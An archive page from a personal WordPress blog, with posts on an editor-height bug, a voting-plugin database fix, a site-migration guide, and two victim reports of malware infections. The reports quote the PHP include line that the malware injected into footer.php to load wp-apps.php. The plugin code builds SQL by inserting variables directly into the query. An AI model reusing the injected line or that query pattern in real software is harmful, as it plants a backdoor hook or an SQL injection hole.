Archive for Wordpress

WordPress 3.5 – Post Box/Post Editor size bug?

Upgraded to WordPress 3.5. Now there is no option to set the post box size. Earlier one could set the size in Settings > Writing.

I was editing a long post on a site, and box height increased automatically. I’ve tried reducing the box size manually, but I always get a very long box when I try to edit a post or go to add new post. Height of the box is 5000px.

I found this code in wp-class-editor.php

if ( $cookie )
$set['editor_height'] = $cookie;
if ( $set['editor_height'] < 50 ) $set['editor_height'] = 50; elseif ( $set['editor_height'] > 5000 )
$set['editor_height'] = 5000;
return $set;

Tried clearing cookies, used a different browser, I still get a long box.

The code seems right, cookie functionality seems to be broken.

Update: (25th January, 2013) The bug has been fixed in WordPress 3.5.1


WordPress Malware: Javascript insertion in index.php

script type="text/javascript" src=""></script>

<script type="text/javascript" src=""></script>

<script type="text/javascript" src=""></script>

My sites keep getting infected by this. I use latest version of WordPress, all plugins seem fine, no bad code in the the theme as well. Maybe there is a virus in my PC, or the ftp credentials were stolen or there are some infected php files on my server.

Comments (2)

Fixed a php bug, $wpdb->get_var() – Differentiating between zero & no results

I use a custom made voting plugin for one of my website. It lets users vote a vote up or down.

There’s code in the plugin that checks if voting data already exists for a post or not, if it exists, the code would update that row else it would create a new row.

For posts that had zero votes, the plugin was creating new row each time a user voted.

The code used to check if an entry existed:


$sql="SELECT `$up_type` FROM `$table_name` WHERE `post_id` = '$post_id' ;";
return $to_ret;

For no results and for a post with 0 votes, it would return the value 0.

I created a separate function because the same function was called multiple times, and for some instances I needed it to return 0 value. Anyways, I modified the code.


$sql="SELECT `$up_type` FROM `$table_name` WHERE `post_id` = '$post_id' ;";
return $to_ret;

The get_var function returns a single variable from the database. Though only one variable is returned, the entire result of the query is cached for later use. Returns NULL if no result is found.


Moving a wordpress website to a different account

//Exporting database
1) Log in to your hosting Panel.
2) Go to PHPmyadmin, log in with database name and password (details in wp-config.php), click on the database (left side).
3) Go to export tab. Choose “Custom” as Export Method. Select all tables.
4) Set compression to gzipped. Click Go. Save the database file.

//Website Data
1) Delete cache if your website has lot of cached files. (Optional)
2) Go to your hosting Panel > File Manager.
3) Create a zipped file of the site folder, (This method doesn’t work for large websites.) For large websites, use SSH(Putty).
4) Log in to putty.
5) Enter the following commands one by one. Replace accountusername by your Cpanel username. Replace foldername by your website’s folder name.

cd / (Changes current directory to root)
cd home/accountusername/public_html/(Changes current directory to public_html)
tar cvzf t20.tar.gz foldername (Creates a gzipped file of the website folder)

6) Exit putty. File be saved in public_html folder.
7) Put wp-config.php back in the website folder.

//New Hosting Account
1) Add the domain in Addon Domains.
2) Create a database. Create a database user. Add the user to that database, full permissions.

//Upload files
This can be done through ftp client or via Putty. Transfer via putty is much faster.

1) Log in to putty.
2) Run these commands one by one.
cd /
cd home/accountusername/public_html/
wget (Downloads the file to your server)
tar xvvf sitename.tar.gz (Extracts files)
3) Delete the gzipped file. (Optional)

//Configuring WordPress
1) Update the database/user details in wp-config.php file.
2) Go to PHPMyadmin > your database.
3) Go to import tab and upload the database file.

//Making things work on new hosting account.
1) Go to Settings > Media. Make sure the path is not of the old hosting account.
2) Sometimes there are paths saved in database. Like path to upload files. Update these paths for your plugins according to your new hosting account .
3) If WP super cache plugin is enabled, go to wp-content folder, delete the advanced-cache.php file. It will be generated again, once you visit the WP-Super Cache settings page.

//Deleting stuff from hosting account.
1) Delete e-mail address.
1) Delete domain from domain manager.
2) Delete database and database user. (Make sure that you don’t delete the wrong database.)
4) Delete the website folder. (Putty command to delete a folder tree: rm -fR foldername

//Transferring Domain
1) Log in the account, Domain name > Unlock the domain > Grab the Auth Key.
2) Go to your new Domain registrar account.
3) Initiate the domain transfer process. Normally 3-5 days process.
4) Confirm the transfer. (Confirmation e-mail)
5) Change nameservers. (If moving to another hosting company)

Thought it might come in handy for my webmaster buddies.


Another Malware attack on WordPress sites (wp-apps.php & wp-count.php)

One of my hosting account has been affected by this Malware. So far, haven’t been able to figure out how it got there.

Two files are created in WordPress directories: wp-apps.php and wp-count.php
And in the theme, mostly footer.php is modified. This code gets added to the file.

< ?php error_reporting(0);include_once $_SERVER['DOCUMENT_ROOT'].'/wp-apps.php';? >

Using latest version of WordPress now. I removed the files before couple of times, but the files come back again like after a week.

Some of my websites have WordPress installed in directories, as in
These folders don’t get affected. Only the ones with TLDs in the name get affected. Also the site in public_html doesn’t get affected. I could try changing all the passwords, too many sites, too many passwords, bummer…besides I wouldn’t find out how did the files get there.

The virus files: wp-count.php.txt & wp-apps.php.txt